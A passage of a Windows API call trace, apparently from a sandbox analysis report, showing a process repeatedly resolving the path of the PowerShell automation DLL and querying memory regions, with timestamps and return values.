GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.521] VirtualQuery (in: lpAddress=0xebc50, lpBuffer=0xecb10, dwLength=0x30 | out: lpBuffer=0xecb10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.524] VirtualQuery (in: lpAddress=0xebc50, lpBuffer=0xecb10, dwLength=0x30 | out: lpBuffer=0xecb10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.525] VirtualQuery (in: lpAddress=0xebc50, lpBuffer=0xecb10, dwLength=0x30 | out: lpBuffer=0xecb10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.526] VirtualQuery (in: lpAddress=0xebc50, lpBuffer=0xecb10, dwLength=0x30 | out: lpBuffer=0xecb10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.526] VirtualQuery (in: lpAddress=0xeb340, lpBuffer=0xec200, dwLength=0x30 | out: lpBuffer=0xec200*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.526] VirtualQuery (in: lpAddress=0xeb3d0, lpBuffer=0xec290, dwLength=0x30 | out: lpBuffer=0xec290*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.526] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.526] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.527] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.527] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.527] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.527] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.527] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.527] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.528] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.528] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.528] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.528] VirtualQuery (in: lpAddress=0xeb780, lpBuffer=0xec640, dwLength=0x30 | out: lpBuffer=0xec640*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.528] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.528] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.529] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.529] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.529] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x1df2afcf, Data2=0x4960, Data3=0x4da6, Data4=([0]=0xa2, [1]=0x76, [2]=0x80, [3]=0x56, [4]=0x20, [5]=0x62, [6]=0x4e, [7]=0x44))) returned 0x0 [0085.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.530] GetFullPathNameW (in: 